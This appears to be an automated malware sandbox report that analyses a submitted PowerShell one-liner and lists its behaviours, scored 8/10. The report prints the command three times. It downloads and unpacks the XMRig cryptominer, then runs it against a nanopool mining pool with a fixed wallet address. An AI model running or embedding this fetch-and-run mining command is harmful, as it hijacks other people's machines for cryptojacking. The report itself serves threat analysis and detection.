General
-
Target
http://Invoke-WebRequest -Uri "https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip" -OutFile "xmrig.zip" Expand-Archive xmrig.zip .\xmrig\xmrig-6.21.3\xmrig.exe -o xmr-eu1.nanopool.org:10300 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3 --cpu-priority 4
-
Sample
241109-nsc1sateqc
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://Invoke-WebRequest -Uri "https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip" -OutFile "xmrig.zip" Expand-Archive xmrig.zip .\xmrig\xmrig-6.21.3\xmrig.exe -o xmr-eu1.nanopool.org:10300 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3 --cpu-priority 4
Resource
win11-20241007-en
Malware Config
Targets
-
-
Target
http://Invoke-WebRequest -Uri "https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip" -OutFile "xmrig.zip" Expand-Archive xmrig.zip .\xmrig\xmrig-6.21.3\xmrig.exe -o xmr-eu1.nanopool.org:10300 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3 --cpu-priority 4
Score8/10-
Downloads MZ/PE file
-
Executes dropped EXE
-
Loads dropped DLL
-
Checks installed software on the system
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory
-